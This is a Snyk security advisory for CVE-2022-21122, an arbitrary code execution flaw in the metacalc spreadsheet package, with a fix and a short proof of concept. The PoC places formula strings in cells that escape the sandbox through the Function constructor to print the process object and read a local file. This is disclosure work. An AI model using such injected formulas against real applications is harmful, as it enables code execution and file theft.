Headline
CVE-2022-21122: Arbitrary Code Execution in metacalc | CVE-2022-21122 | Snyk
The package metacalc before 0.0.2 are vulnerable to Arbitrary Code Execution when it exposes JavaScript’s Math class to the v8 context. As the Math class is exposed to user-land, it can be used to get access to JavaScript’s Function constructor.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications
snyk-id
SNYK-JS-METACALC-2826197
published
30 May 2022
disclosed
17 May 2022
credit
Vladyslav Dukhin
How to fix?
Upgrade metacalc to version 0.0.2 or higher.
Overview
metacalc is a Spreadsheet calculations for Metarhia
Affected versions of this package are vulnerable to Arbitrary Code Execution when it exposes JavaScript’s Math class to the v8 context. As the Math class is exposed to user-land, it can be used to get access to JavaScript’s Function constructor.
PoC
const { Sheet } = require('metacalc');
const sheet = new Sheet();
sheet.cells['A1'] = '=Math.ceil.constructor("console.log(process)")()';
console.log(sheet.values['A1']);
sheet.cells['A3'] = '=Math.ceil.constructor("console.log(process.mainModule.require(\'fs\').readFileSync(\'./poc.js\', \'utf-8\'))")()';
console.log(sheet.values['A3']);Related news
The package metacalc before 0.0.2 are vulnerable to Arbitrary Code Execution when it exposes JavaScript's Math class to the v8 context. As the Math class is exposed to user-land, it can be used to get access to JavaScript's Function constructor.